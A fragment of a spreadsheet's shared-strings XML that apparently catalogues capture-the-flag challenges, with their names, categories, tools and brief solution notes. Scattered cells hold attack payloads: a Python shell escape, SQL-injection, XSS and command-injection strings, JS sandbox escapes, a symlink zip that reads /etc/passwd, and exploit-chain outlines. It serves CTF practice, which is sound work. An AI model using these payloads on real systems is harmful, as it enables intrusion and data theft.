    <t>obtain a user account that doesn’t have restrictions</t>
  </si>
  <si>
    <t>sql truncation</t>
  </si>
  <si>
    <t>trend micro</t>
  </si>
  <si>
    <t>offensive 100</t>
  </si>
  <si>
    <t>Huge Key</t>
  </si>
  <si>
    <t>How do we login?</t>
  </si>
  <si>
    <t>AES cipher</t>
  </si>
  <si>
    <t xml:space="preserve">Web app uses SHA-1 of login time to create a session ID. Causing Sessions to be overwritten. Connect with a forged cookie containing the timestamp of the admins login time. You must login during the same second but before the admin connects to get the flag </t>
  </si>
  <si>
    <t>Rolling Hash</t>
  </si>
  <si>
    <t xml:space="preserve"> </t>
  </si>
  <si>
    <t>Ekoparty-ctf</t>
  </si>
  <si>
    <t>custom ACL</t>
  </si>
  <si>
    <t>access admin</t>
  </si>
  <si>
    <t>crypto 100</t>
  </si>
  <si>
    <t>use python script to fill parameters of the vector</t>
  </si>
  <si>
    <t>http://code.runnable.com/</t>
  </si>
  <si>
    <t>plain text attack</t>
  </si>
  <si>
    <t>crypto 200</t>
  </si>
  <si>
    <t>brute force salt length and make cert</t>
  </si>
  <si>
    <t>crypto 300</t>
  </si>
  <si>
    <t>RandDOOM</t>
  </si>
  <si>
    <t>is password recovery safe?</t>
  </si>
  <si>
    <t>find plain text 4x4 matrix</t>
  </si>
  <si>
    <t>exploit mt_rand with known key to get admin password</t>
  </si>
  <si>
    <t>crypto 400</t>
  </si>
  <si>
    <t>Chinese remainder theorem</t>
  </si>
  <si>
    <t>Pass Check</t>
  </si>
  <si>
    <t>pass validation</t>
  </si>
  <si>
    <t>replace 'password=test' with 'paswword[]=test'</t>
  </si>
  <si>
    <t>ASIS Quals CTF</t>
  </si>
  <si>
    <t>best photo</t>
  </si>
  <si>
    <t>exploit the webapp</t>
  </si>
  <si>
    <t>Japanese super micro-controller</t>
  </si>
  <si>
    <t>Another one</t>
  </si>
  <si>
    <t>Upload a photo with an SQL injection in the metadata -&gt; repeat the process to retrieve the flag (web)</t>
  </si>
  <si>
    <t>Renesas SH</t>
  </si>
  <si>
    <t>run with ElectronicColoringBook tool</t>
  </si>
  <si>
    <t>ElectronicColoringBook</t>
  </si>
  <si>
    <t>asis-ctf-quals</t>
  </si>
  <si>
    <t>archaic</t>
  </si>
  <si>
    <t>Merkle-Hellman</t>
  </si>
  <si>
    <t>Math based attack using 4 large matricies and the LLL Lattice Reduction Algorithm and Sage (crypto)</t>
  </si>
  <si>
    <t>brute force file descriptor number</t>
  </si>
  <si>
    <t>Secret Message</t>
  </si>
  <si>
    <t>Retrieve the mail</t>
  </si>
  <si>
    <t>Webapp uses php mail() to send messages, add yourself to the email under bcc to recieve a copy and admin credentials. Log into the website as admin to retrieve flag (web)</t>
  </si>
  <si>
    <t>haxdump</t>
  </si>
  <si>
    <t>nightmare</t>
  </si>
  <si>
    <t>nih</t>
  </si>
  <si>
    <t>hidden flag</t>
  </si>
  <si>
    <t>get access list to system</t>
  </si>
  <si>
    <t>SHA-256</t>
  </si>
  <si>
    <t>Flag is SHA-256x2 -&gt; Write py script to bruteforce combinations (crypto)</t>
  </si>
  <si>
    <t>range of ips</t>
  </si>
  <si>
    <t>test all ips from 0-255, python script</t>
  </si>
  <si>
    <t>Plough</t>
  </si>
  <si>
    <t>Plough Cypher</t>
  </si>
  <si>
    <t>keep calm and save the queen</t>
  </si>
  <si>
    <t>Study given .cpp file -&gt; write py script to break encryption(Crypto)</t>
  </si>
  <si>
    <t>worthless</t>
  </si>
  <si>
    <t>callme</t>
  </si>
  <si>
    <t>group 0s and 1s by bytes</t>
  </si>
  <si>
    <t>xortool</t>
  </si>
  <si>
    <t>ASIS Fnials CTF</t>
  </si>
  <si>
    <t>sprintf() buffer overflow</t>
  </si>
  <si>
    <t>impossible</t>
  </si>
  <si>
    <t>decrypt it(easy)</t>
  </si>
  <si>
    <t>chinese remainder thm</t>
  </si>
  <si>
    <t>easy cipher</t>
  </si>
  <si>
    <t>get admin</t>
  </si>
  <si>
    <t>Generate an Md5 hash collision with the admin account to leak his credentials</t>
  </si>
  <si>
    <t>convert to string</t>
  </si>
  <si>
    <t>Ms. Fortune</t>
  </si>
  <si>
    <t>myblog</t>
  </si>
  <si>
    <t>nibble</t>
  </si>
  <si>
    <t>parse openPGP, fermat's factorization</t>
  </si>
  <si>
    <t>gain access to a directory</t>
  </si>
  <si>
    <t>string</t>
  </si>
  <si>
    <t>overwrite strcmp to create custom fd</t>
  </si>
  <si>
    <t>robots.txt keeps you from viewing /myblog_private_dir3ct0ry. Forge a packet containing ' http://myblog.asis-ctf.ir:8088/myblog_private_dir3ct0ry/?username=admin&amp;password=admin&amp;login=admin&amp;user=admin' as the referer</t>
  </si>
  <si>
    <t>graphs</t>
  </si>
  <si>
    <t>custom block cipher</t>
  </si>
  <si>
    <t>http://www.msoos.org/2014/04/cryptominisat-4-released/</t>
  </si>
  <si>
    <t>nightly-auth</t>
  </si>
  <si>
    <t>valid user</t>
  </si>
  <si>
    <t>time zip to find authenticated user</t>
  </si>
  <si>
    <t>confidence teaser ctf</t>
  </si>
  <si>
    <t>mac-hacking</t>
  </si>
  <si>
    <t>php - MD5</t>
  </si>
  <si>
    <t>Generate an HMAC collision with the admin username then register an account with the collided account</t>
  </si>
  <si>
    <t>parlor</t>
  </si>
  <si>
    <t>freya</t>
  </si>
  <si>
    <t>pcap</t>
  </si>
  <si>
    <t>get access to server</t>
  </si>
  <si>
    <t>length extension attack (https://en.wikipedia.org/wiki/Length_extension_attack)</t>
  </si>
  <si>
    <t>kerberos</t>
  </si>
  <si>
    <t>kinit -S host/shell.woo.pctf ppp'</t>
  </si>
  <si>
    <t>backdoor ctf</t>
  </si>
  <si>
    <t>worst-pwn-ever</t>
  </si>
  <si>
    <t>Get flag from an enviromentalists system</t>
  </si>
  <si>
    <t>extract private key from the corrupted file</t>
  </si>
  <si>
    <t>Server is running a basic shell written in python. Execute shell with py command and list the enviroment variables of the system to get flag</t>
  </si>
  <si>
    <t>__import__('os').execl('/bin/sh','sh')' , printenv</t>
  </si>
  <si>
    <t>‘cat public.pub | grep -v -- ----- | tr -d '\n' | base64 -d | openssl asn1parse -inform DER -i -strparse 18’</t>
  </si>
  <si>
    <t>twenty</t>
  </si>
  <si>
    <t>find trigrams and solve</t>
  </si>
  <si>
    <t>wheeeee</t>
  </si>
  <si>
    <t>halphow2js</t>
  </si>
  <si>
    <t>enter the 5 correct inputs to retrieve key</t>
  </si>
  <si>
    <t>curl</t>
  </si>
  <si>
    <t>Python script, slide attack (https://en.wikipedia.org/wiki/Slide_attack)</t>
  </si>
  <si>
    <t>the golden gate</t>
  </si>
  <si>
    <t>reverse given cipher, invert each byte before decrypt</t>
  </si>
  <si>
    <t xml:space="preserve">Vigenere </t>
  </si>
  <si>
    <t>Bruteforce ciphertext using tool</t>
  </si>
  <si>
    <t>ghost in the shellcode 2015 teaser</t>
  </si>
  <si>
    <t>citadel</t>
  </si>
  <si>
    <t>Get the flag from binary</t>
  </si>
  <si>
    <t xml:space="preserve">very tricky format string vunerablity against c++ function asprintf </t>
  </si>
  <si>
    <t>apache underwear</t>
  </si>
  <si>
    <t>overthere</t>
  </si>
  <si>
    <t>apache config files</t>
  </si>
  <si>
    <t>get the flag from a server</t>
  </si>
  <si>
    <t>Private key value is contained in source -&gt; use keyczar to reverse the encryption</t>
  </si>
  <si>
    <t>format string to bypass restriction, then exit</t>
  </si>
  <si>
    <t>touch -- -T -TTcat\ flag; exit</t>
  </si>
  <si>
    <t>connect to the socks5 server using a basic sql injection "' or 1=1 . Once you've connected take a look at the Apache Mod Status page and open the file '/omg-omg-s3cr3t-file.txt' (web)</t>
  </si>
  <si>
    <t>math</t>
  </si>
  <si>
    <t>recon 250</t>
  </si>
  <si>
    <t>PGP Protected Email</t>
  </si>
  <si>
    <t>Find flag given pgp exchange</t>
  </si>
  <si>
    <t>Given PGP encrypted email, find PGP private key and passphrase on personal website.</t>
  </si>
  <si>
    <t>Practical Numerology</t>
  </si>
  <si>
    <t>guess the magic number</t>
  </si>
  <si>
    <t>Basic timing attack against the web server. Send a large value which will cause the server to print out the correct value but not update. From there you can enter in the given value to get the flag</t>
  </si>
  <si>
    <t>Csaw CTF</t>
  </si>
  <si>
    <t>K_stairs</t>
  </si>
  <si>
    <t>beat the first level</t>
  </si>
  <si>
    <t xml:space="preserve">number of tokens stored in session, just register a bunch of accounts and play the game </t>
  </si>
  <si>
    <t>backdoor</t>
  </si>
  <si>
    <t>K_Achieve</t>
  </si>
  <si>
    <t>mindblow</t>
  </si>
  <si>
    <t>beat the game without taking damage</t>
  </si>
  <si>
    <t>PBKDF2+HMAC hash collisions</t>
  </si>
  <si>
    <t>printf 'complexPasswordWhichContainsManyCharactersWithRandomSuffixeghjrjg' | sha1sum | xxd -r -p</t>
  </si>
  <si>
    <t xml:space="preserve">modify the map file in local storage to place yourself right next to the stairs so you take no damage </t>
  </si>
  <si>
    <t>lawn-care-simulator</t>
  </si>
  <si>
    <t>login</t>
  </si>
  <si>
    <t>First use DVCS-Pillage to scrape the git repo from the page. The login script uses a LIKE comparison to check for existing users. It is then possible to pass '%' in the username field to leak existing users. You must then bruteforce byte by byte on the password hash</t>
  </si>
  <si>
    <t>CRYPTonite</t>
  </si>
  <si>
    <t xml:space="preserve">ciphertext is passage from famous spanish novel Don Quixote </t>
  </si>
  <si>
    <t>Crypting</t>
  </si>
  <si>
    <t>keyboard map</t>
  </si>
  <si>
    <t xml:space="preserve">Given ciphertext maps little pictures on the keyboard. </t>
  </si>
  <si>
    <t>emdee</t>
  </si>
  <si>
    <t>Special Md5</t>
  </si>
  <si>
    <t xml:space="preserve">Use the del char '\xF7' to delete portions of the salt for easier brute forcing </t>
  </si>
  <si>
    <t>hitman</t>
  </si>
  <si>
    <t xml:space="preserve">weebdate </t>
  </si>
  <si>
    <t>rsaha</t>
  </si>
  <si>
    <t>Leak customer data through LFI using SQL-map / Burpsuite. Then crack the password hash's using JTR, Finally find server root and seal the TOTP algorithm to generate the correct TOTP key.</t>
  </si>
  <si>
    <t>Franklin-Reiter Related Message Attack.</t>
  </si>
  <si>
    <t>Burp-Suite, SQL-Map, John The Ripper</t>
  </si>
  <si>
    <t>thwoback</t>
  </si>
  <si>
    <t>medium?</t>
  </si>
  <si>
    <t>reproduce the vunlerabilities</t>
  </si>
  <si>
    <t>eXPLicit</t>
  </si>
  <si>
    <t>Browse the CTF software on github and look for the fixed vunerabilities in the commits. generate a POST request to one of the supposidly 'fixed' vulerabilities to get tthe flag</t>
  </si>
  <si>
    <t>git-commands, curl</t>
  </si>
  <si>
    <t>Leak stack canary using format string -&gt; overwrite EIP and call mmap() to allocate RWX memory -&gt; copy shellcode into memory using read() -&gt; jump to shellcode</t>
  </si>
  <si>
    <t>Cyber Secuirty Challenege</t>
  </si>
  <si>
    <t>NSA</t>
  </si>
  <si>
    <t>medium level SQL Injection with some keywords filtered</t>
  </si>
  <si>
    <t>Seccon-quals</t>
  </si>
  <si>
    <t>((m + 1) ** 3 +  2 * m ** 3 - 1) / ((m + 1) ** 3 - m ** 3 + 2) = m mod n</t>
  </si>
  <si>
    <t>bonsai XSS revolutions</t>
  </si>
  <si>
    <t>.NET executable</t>
  </si>
  <si>
    <t>what is your browser</t>
  </si>
  <si>
    <t>hash</t>
  </si>
  <si>
    <t>nc localhost 25' inject HTML in the header fields, use the payload to display data '&lt;img src=0 onerror=alert(navigator.userAgent)&gt;'</t>
  </si>
  <si>
    <t>write script using Hashpump to bruteforce</t>
  </si>
  <si>
    <t>.NET Framework 4.5</t>
  </si>
  <si>
    <t>Hashpump</t>
  </si>
  <si>
    <t>echof</t>
  </si>
  <si>
    <t>connect to the server</t>
  </si>
  <si>
    <t>crypto200</t>
  </si>
  <si>
    <t>very difficult format string vunerablity (exploit)</t>
  </si>
  <si>
    <t>log on to server</t>
  </si>
  <si>
    <t>Queen Mary Cipher(substitution cipher)</t>
  </si>
  <si>
    <t>flag is disguised in data coming from the server</t>
  </si>
  <si>
    <t>frequency analyses</t>
  </si>
  <si>
    <t xml:space="preserve">very difficult format string vunerablity </t>
  </si>
  <si>
    <t>hopper, gdb, ida</t>
  </si>
  <si>
    <t>crypto300</t>
  </si>
  <si>
    <t>Entry-form</t>
  </si>
  <si>
    <t>SSL, Diffie-Hellman</t>
  </si>
  <si>
    <t>create master key logfile and feed it to wireshark</t>
  </si>
  <si>
    <t>tlslite</t>
  </si>
  <si>
    <t>follow link</t>
  </si>
  <si>
    <t>bash command injection into param(), send ';ls -la;'</t>
  </si>
  <si>
    <t>oldcrypto</t>
  </si>
  <si>
    <t>every 7 seconds</t>
  </si>
  <si>
    <t>convert to ascii code</t>
  </si>
  <si>
    <t>sha1lcode</t>
  </si>
  <si>
    <t>eko party pre ctf</t>
  </si>
  <si>
    <t>flag requester</t>
  </si>
  <si>
    <t>RSA Quine</t>
  </si>
  <si>
    <t>fast enough to brute force because it is a small size,2 bytes</t>
  </si>
  <si>
    <t>hackers-market</t>
  </si>
  <si>
    <t>download login script</t>
  </si>
  <si>
    <t>decompile to find flag in comments</t>
  </si>
  <si>
    <t>safebox</t>
  </si>
  <si>
    <t>config.bin</t>
  </si>
  <si>
    <t>admin visiting page</t>
  </si>
  <si>
    <t>stkof</t>
  </si>
  <si>
    <t>AES-256 in ECB</t>
  </si>
  <si>
    <t>take flag from admin when he visits because his javascript is loaded</t>
  </si>
  <si>
    <t>heap based buffer overflow</t>
  </si>
  <si>
    <t>hackover</t>
  </si>
  <si>
    <t>overwrite GOT entry of atol(), and instert ROP chain</t>
  </si>
  <si>
    <t>hack the planet</t>
  </si>
  <si>
    <t>headers</t>
  </si>
  <si>
    <t xml:space="preserve">Dump the IAD backup file -&gt; You'll see the length of the used password -&gt;Bruteforce it. </t>
  </si>
  <si>
    <t>send heeader, get response with the 5 most used password, try all</t>
  </si>
  <si>
    <t>ty</t>
  </si>
  <si>
    <t>messagecenter</t>
  </si>
  <si>
    <t>autologin</t>
  </si>
  <si>
    <t>autologin uses == and not === so cookie can be crafted to pass</t>
  </si>
  <si>
    <t>securelogin</t>
  </si>
  <si>
    <t>admin400</t>
  </si>
  <si>
    <t>cpp</t>
  </si>
  <si>
    <t>LHC: Ludicrous Hash Collider</t>
  </si>
  <si>
    <t>libraries used but no includes</t>
  </si>
  <si>
    <t>very hard</t>
  </si>
  <si>
    <t>find libraries, fix seg fault by making them work with eachother</t>
  </si>
  <si>
    <t>Combo of CRC 32 and MD5</t>
  </si>
  <si>
    <t>python script to test different sql injections for admin</t>
  </si>
  <si>
    <t>Generate 5 simultaneous CRC32 and MD5 collisions</t>
  </si>
  <si>
    <t>Hitcon-ctf-quals</t>
  </si>
  <si>
    <t>phishingme</t>
  </si>
  <si>
    <t>email malicious document</t>
  </si>
  <si>
    <t>Script to use DNS queries to list files in directory</t>
  </si>
  <si>
    <t>Use-after-flee</t>
  </si>
  <si>
    <t>0ops APP</t>
  </si>
  <si>
    <t>break out of sandbox</t>
  </si>
  <si>
    <t>upload your shell</t>
  </si>
  <si>
    <t>vulnerability in unserialize() with SplDoublyLinkedList</t>
  </si>
  <si>
    <t>https://github.com/80vul/phpcodz/blob/master/research/pch-034.md</t>
  </si>
  <si>
    <t>FlagGenerator</t>
  </si>
  <si>
    <t>generate the correct flag</t>
  </si>
  <si>
    <t>ROP chain</t>
  </si>
  <si>
    <t>babyfirst</t>
  </si>
  <si>
    <t>do it first</t>
  </si>
  <si>
    <t>run shell command to download script, run downloaded script</t>
  </si>
  <si>
    <t>freenote</t>
  </si>
  <si>
    <t>free the hidden note</t>
  </si>
  <si>
    <t>double free</t>
  </si>
  <si>
    <t>mic</t>
  </si>
  <si>
    <t>chineese remainder theorm</t>
  </si>
  <si>
    <t xml:space="preserve">Send a two bases two server, some g, and prime - g, so then we can get a remainder of 2*FLAG by modulo of prime and use CRT to recover flag </t>
  </si>
  <si>
    <t>curious</t>
  </si>
  <si>
    <t>lazy</t>
  </si>
  <si>
    <t>Merkle-Hallman knapsack cryptosystem</t>
  </si>
  <si>
    <t>LLL reduction</t>
  </si>
  <si>
    <t>cryptmsg</t>
  </si>
  <si>
    <t>https://github.com/everping/ctfs/blob/master/2015/4/plaidctf/crypto/lazy/solve.py</t>
  </si>
  <si>
    <t>Can you find the bug?</t>
  </si>
  <si>
    <t>Giraffe's Coffee</t>
  </si>
  <si>
    <t xml:space="preserve">Create a fake python object and execute shell to dump flag </t>
  </si>
  <si>
    <t>pycrypto, https://github.com/sashs/Ropper</t>
  </si>
  <si>
    <t>find flag</t>
  </si>
  <si>
    <t>mt_rand(), bruteforce to find seed, python script</t>
  </si>
  <si>
    <t>PHP mt_rand() seed cracker (http://www.openwall.com/php_mt_seed/)</t>
  </si>
  <si>
    <t>strength</t>
  </si>
  <si>
    <t>rsalot</t>
  </si>
  <si>
    <t>dub-key</t>
  </si>
  <si>
    <t>docker</t>
  </si>
  <si>
    <t>Docker</t>
  </si>
  <si>
    <t>Extract some flag</t>
  </si>
  <si>
    <t xml:space="preserve">Open an abstract unix socket -&gt; map the docker binary to the opened socket -&gt; break free from chroot </t>
  </si>
  <si>
    <t>http://blog.eduardofleury.com/archives/2007/09/13 , http://blog.varunajayasiri.com/passing-file-descriptors-between-processes-using-sendmsg-and-recvmsg</t>
  </si>
  <si>
    <t>fibbed</t>
  </si>
  <si>
    <t>custom-diffie hellman(matrix)</t>
  </si>
  <si>
    <t>sage script to compute private key from public key</t>
  </si>
  <si>
    <t>randBox</t>
  </si>
  <si>
    <t>readme</t>
  </si>
  <si>
    <t>10 different ciphers</t>
  </si>
  <si>
    <t>Find a way to read the flag</t>
  </si>
  <si>
    <t>write script to crack each cipher</t>
  </si>
  <si>
    <t>cause stack overflow to leak flag from memory</t>
  </si>
  <si>
    <t>ida, hopper, radare, http://seclists.org/bugtraq/2010/Apr/243</t>
  </si>
  <si>
    <t>10 levels of different difficulties and ciphers</t>
  </si>
  <si>
    <t>wob-key/wob-key-hard</t>
  </si>
  <si>
    <t>lalala</t>
  </si>
  <si>
    <t>get the shell</t>
  </si>
  <si>
    <t>less than 350 signatures</t>
  </si>
  <si>
    <t>access php-fpm socket via redirection, use tool to write directly to socket</t>
  </si>
  <si>
    <t>wob-key can be obtained during solving wob-key-hard</t>
  </si>
  <si>
    <t>fastcgipacket.rb (https://github.com/ONsec-Lab/scripts/blob/master/fastcgipacket.rb)</t>
  </si>
  <si>
    <t>tsh</t>
  </si>
  <si>
    <t>zio</t>
  </si>
  <si>
    <t>Tum-ctf-teaser</t>
  </si>
  <si>
    <t>redundant_code</t>
  </si>
  <si>
    <t>Italy Food</t>
  </si>
  <si>
    <t>complete submission form</t>
  </si>
  <si>
    <t>Brute-force</t>
  </si>
  <si>
    <t>python script XMPP injection</t>
  </si>
  <si>
    <t>Test some shellcode in the provided sandbox</t>
  </si>
  <si>
    <t>neocities</t>
  </si>
  <si>
    <t xml:space="preserve">cause an overflow in the open/chdir handler to break free from the sandbox </t>
  </si>
  <si>
    <t>warmup</t>
  </si>
  <si>
    <t>change page variable in address bar</t>
  </si>
  <si>
    <t>webshop</t>
  </si>
  <si>
    <t>weak_enc</t>
  </si>
  <si>
    <t>injection over POSt parameter, extract database, time-based sql injection</t>
  </si>
  <si>
    <t>itertools, hashlib</t>
  </si>
  <si>
    <t>Th3jacker-ctf</t>
  </si>
  <si>
    <t>airport</t>
  </si>
  <si>
    <t>don't waste your time</t>
  </si>
  <si>
    <t>teufel</t>
  </si>
  <si>
    <t>‘pow(4, mod_invert(0b11, p-1)’</t>
  </si>
  <si>
    <t>decode base64, bruteforce passphrase</t>
  </si>
  <si>
    <t>Get flag from service</t>
  </si>
  <si>
    <t>Nullcon-hacksim</t>
  </si>
  <si>
    <t xml:space="preserve">get mmap adress using info leak -&gt; overwrite RBP with GOT entry -&gt; overwrite RIP to dump mmap and libc addresses -&gt; use info to execute a shell </t>
  </si>
  <si>
    <t>hopper, ida, radare</t>
  </si>
  <si>
    <t>Web 1</t>
  </si>
  <si>
    <t>find error</t>
  </si>
  <si>
    <t>change PHPSESSID cookie and record error messages</t>
  </si>
  <si>
    <t>bowdoin</t>
  </si>
  <si>
    <t>use Sage, Coppersmith</t>
  </si>
  <si>
    <t>Web 3</t>
  </si>
  <si>
    <t>SageMath http://www.sagemath.org/</t>
  </si>
  <si>
    <t>find key</t>
  </si>
  <si>
    <t>shorthand of loopback in IPv6 is ::1, or 0:0:0:0:0:0:0:1</t>
  </si>
  <si>
    <t>Web 5</t>
  </si>
  <si>
    <t>zpwn</t>
  </si>
  <si>
    <t>IBM s390 asm</t>
  </si>
  <si>
    <t>zpwn the binary</t>
  </si>
  <si>
    <t>break the captcha</t>
  </si>
  <si>
    <t>Bruteforce the 4 bytes of CRC then append the bytes at the end of your shellcode to gain RCE</t>
  </si>
  <si>
    <t>OCR to get text from image, python script to grab data in POST request</t>
  </si>
  <si>
    <t>OCR, tesseract-ocr</t>
  </si>
  <si>
    <t>DCTF</t>
  </si>
  <si>
    <t>Medium</t>
  </si>
  <si>
    <t>Get enough money for the flag</t>
  </si>
  <si>
    <t>You can trigger a race condition with the given discount code so your account is creditied multiple times. Delete the session cookies then send multiple requests to the server containing the discount code to get enough money for the flag</t>
  </si>
  <si>
    <t>burpsuite?</t>
  </si>
  <si>
    <t>the hylian dude</t>
  </si>
  <si>
    <t>orient heights</t>
  </si>
  <si>
    <t>Capture the flag</t>
  </si>
  <si>
    <t>ElGamal signature scheme</t>
  </si>
  <si>
    <t>Create a zip containing a symbolic link to /etc/passwd - 'ln -s /etc/passwd passwd' Then zip the symbolic link 'zip --symlinks -r h.zip passwd' Upload your zip file where the server will then be able to handle your symbolic link</t>
  </si>
  <si>
    <t>‘s.send(open('sigs/sig343.txt').read() + 'x')’</t>
  </si>
  <si>
    <t>linux command: curl</t>
  </si>
  <si>
    <t>rocket science admin panel</t>
  </si>
  <si>
    <t>hard?</t>
  </si>
  <si>
    <t>Login as admin</t>
  </si>
  <si>
    <t>EBP</t>
  </si>
  <si>
    <t>C</t>
  </si>
  <si>
    <t>analyze program control flow</t>
  </si>
  <si>
    <t>vuln100</t>
  </si>
  <si>
    <t>connect to nc</t>
  </si>
  <si>
    <t>input '\' gives flag</t>
  </si>
  <si>
    <t>wrote a python script to register and authenticate automatically. The last step we took, was to send a huge amount of characters to the server. Register an login failes and we get the register and login mask as a response. 1024 characters lead to a successful registration, but we got a “nop” as response by logging into the service. When we sent 255 a’s we got a successful login and the flag was given.</t>
  </si>
  <si>
    <t>vuln200</t>
  </si>
  <si>
    <t>NONAME</t>
  </si>
  <si>
    <t>Clojure</t>
  </si>
  <si>
    <t>retrieve flag from website</t>
  </si>
  <si>
    <t>exploit private functions</t>
  </si>
  <si>
    <t>exploit the web server</t>
  </si>
  <si>
    <t>We can then bypass the filter and use hexadecimal strings to get a RCE ! I'm gonna use the xxd tool to generate the hexadecimal string, so the commands are gonna be human readable.</t>
  </si>
  <si>
    <t>forgot</t>
  </si>
  <si>
    <t>linux command: xxd</t>
  </si>
  <si>
    <t>reach a non-reachable state in FSA (Finite State Automaton)</t>
  </si>
  <si>
    <t>defCon Quals</t>
  </si>
  <si>
    <t>waiting for your touch</t>
  </si>
  <si>
    <t>You can never log in</t>
  </si>
  <si>
    <t>Remove the elemenet that prevents you from clicking the button. Then send a request with your account name and 'created_at' followed by a very early unix timestamp</t>
  </si>
  <si>
    <t>Hack Dat Kiwi CTF</t>
  </si>
  <si>
    <t>HTI</t>
  </si>
  <si>
    <t>capture the flag</t>
  </si>
  <si>
    <t>concealed</t>
  </si>
  <si>
    <t>paths have been conealed</t>
  </si>
  <si>
    <t>js script, exploit function(), callee, caller</t>
  </si>
  <si>
    <t>function() { return String(arguments.callee.caller.caller.caller.caller.caller.caller.caller.caller.caller); }'</t>
  </si>
  <si>
    <t>wonderland</t>
  </si>
  <si>
    <t>chinese remainder theroem</t>
  </si>
  <si>
    <t>Simply put the modifiable inputs in a data block, and PTI will ignore them, and NTI will be unable to match the input because it changes too much:</t>
  </si>
  <si>
    <t>wood island</t>
  </si>
  <si>
    <t>s.send(open('sigs/sig343.txt').read() + 'x')</t>
  </si>
  <si>
    <t>closed</t>
  </si>
  <si>
    <t>carder</t>
  </si>
  <si>
    <t>js script</t>
  </si>
  <si>
    <t>CSA</t>
  </si>
  <si>
    <t>function() { Array.prototype.forEach = function(callback, array) { return callback.call(array, 'flag.txt'); }; return sandboxed.readFlag(); }'</t>
  </si>
  <si>
    <t>Bruteforce an ECM stream to bruteforce seed. Once you can decrypt the remaining ECM's you can decrypt the audio to retrieve the flag (crypto)</t>
  </si>
  <si>
    <t>TSReader, DVBSnoop, http://www.cardman.com/cards.html, http://www.atmel.com/images/doc0841.pdf</t>
  </si>
  <si>
    <t>good-crypto</t>
  </si>
  <si>
    <t>WEP</t>
  </si>
  <si>
    <t>PTI</t>
  </si>
  <si>
    <t xml:space="preserve">given 40-bit hex key you must then bruteforce the correct passphrase </t>
  </si>
  <si>
    <t>aircrack-ng, http://foremost.sourceforge.net/ , http://www.netresec.com/?page=NetworkMiner , https://stackoverflow.com/questions/2890438/how-can-i-generate-40-64-bit-wep-key-in-python/2890571#2890571 , http://www.blackhat.com/presentations/bh-usa-01/TimNewsham/bh-usa-01-Tim-Newsham.ppt</t>
  </si>
  <si>
    <t>every single thing that you use in your injection, should be available inside the application code!</t>
  </si>
  <si>
    <t>Zhong Guan Cun</t>
  </si>
  <si>
    <t>NTI</t>
  </si>
  <si>
    <t>access python shell</t>
  </si>
  <si>
    <t>ICBM</t>
  </si>
  <si>
    <t>AES-CBC</t>
  </si>
  <si>
    <t xml:space="preserve">first 16 bytes of AES-CBC acts as a XOR, bruteforce the first 16 bytes of the key </t>
  </si>
  <si>
    <t>icectf</t>
  </si>
  <si>
    <t>BWS</t>
  </si>
  <si>
    <t>2x0r</t>
  </si>
  <si>
    <t>paths</t>
  </si>
  <si>
    <t>2x XOR</t>
  </si>
  <si>
    <t>buffer underflow</t>
  </si>
  <si>
    <t xml:space="preserve">Use XORTool </t>
  </si>
  <si>
    <t>calcpop</t>
  </si>
  <si>
    <t>calc adds two numbers</t>
  </si>
  <si>
    <t>stack based buffer overflow</t>
  </si>
  <si>
    <t>Cryptic Crypto</t>
  </si>
  <si>
    <t>Simple substitution cipher use quipquip</t>
  </si>
  <si>
    <t>QuipQuip</t>
  </si>
  <si>
    <t>Entropy</t>
  </si>
  <si>
    <t>calcpop-reloaded</t>
  </si>
  <si>
    <t>public key crypto?</t>
  </si>
  <si>
    <t xml:space="preserve">Gather enough keys and recover using Euclid's algorithm </t>
  </si>
  <si>
    <t>calc compiled for RedOS(custom for ctf)</t>
  </si>
  <si>
    <t>https://www.hyperelliptic.org/tanja/vortraege/facthacks-29C3.pdf , http://facthacks.cr.yp.to/fermat.html</t>
  </si>
  <si>
    <t>stack based buffer overflow but has to work in RedOS</t>
  </si>
  <si>
    <t>farm-animal</t>
  </si>
  <si>
    <t>Pigpen cipher</t>
  </si>
  <si>
    <t xml:space="preserve">Translate the characters from pigpen to engligh </t>
  </si>
  <si>
    <t>card</t>
  </si>
  <si>
    <t>win the card game</t>
  </si>
  <si>
    <t>leak address for _start and calculate address of printflag()</t>
  </si>
  <si>
    <t>Numb3rs</t>
  </si>
  <si>
    <t>substituation cipher</t>
  </si>
  <si>
    <t xml:space="preserve">The numbers are actually letters 01 == 'a' , 02 == 'b' ..ect </t>
  </si>
  <si>
    <t>Numeric</t>
  </si>
  <si>
    <t>base64</t>
  </si>
  <si>
    <t>flag is in base64, just decode.</t>
  </si>
  <si>
    <t>flag is in base64, just decode. (crypto)</t>
  </si>
  <si>
    <t>Rot13</t>
  </si>
  <si>
    <t>ROT</t>
  </si>
  <si>
    <t>wtfos</t>
  </si>
  <si>
    <t xml:space="preserve">run rot13 on the string again to get the original </t>
  </si>
  <si>
    <t>phyisical pages are allocated by kernal cyclically</t>
  </si>
  <si>
    <t>allocating sequencial pages of shared memory and scanning them for the flag</t>
  </si>
  <si>
    <t>given keys simply decrypt them using language of choice. decrypted = mod(c, N) ** d</t>
  </si>
  <si>
    <t>RSA3</t>
  </si>
  <si>
    <t xml:space="preserve">given public key, exponent, and ciphertext bruteforce the message </t>
  </si>
  <si>
    <t>Pass too many checks for the taint interface to handle and your string will pass</t>
  </si>
  <si>
    <t>Agents</t>
  </si>
  <si>
    <t>gaychal</t>
  </si>
  <si>
    <t>Broken statements</t>
  </si>
  <si>
    <t>Run the code to get the encrypted flag, also you will need to remove the 12 chars that make the interpreter throw errors, afterwards fix 5 + 5 = 10 then the flag will print        php interpreter</t>
  </si>
  <si>
    <t>php interpreter</t>
  </si>
  <si>
    <t>hack Dat Kiwi CTF</t>
  </si>
  <si>
    <t>captcha password</t>
  </si>
  <si>
    <t>exploit the service</t>
  </si>
  <si>
    <t>multi-step, chaining multiple exploits</t>
  </si>
  <si>
    <t xml:space="preserve">kiwi forum </t>
  </si>
  <si>
    <t>VolgaCTF-qual</t>
  </si>
  <si>
    <t xml:space="preserve">I believe there's an LFI vulenrability allowing people to download the flag '?__r=../db/00001.bmp' </t>
  </si>
  <si>
    <t>carry</t>
  </si>
  <si>
    <t>kiwi forum 2</t>
  </si>
  <si>
    <t>download the image from the server</t>
  </si>
  <si>
    <t>cpkc</t>
  </si>
  <si>
    <t>use the HTTP_RANGE available by the downloader to download certain points of the image, and then make a small image with it.</t>
  </si>
  <si>
    <t>gostfuscator</t>
  </si>
  <si>
    <t>lcg</t>
  </si>
  <si>
    <t>custom stream cipher</t>
  </si>
  <si>
    <t>affine-cipher</t>
  </si>
  <si>
    <t>math quiz</t>
  </si>
  <si>
    <t>break the filter</t>
  </si>
  <si>
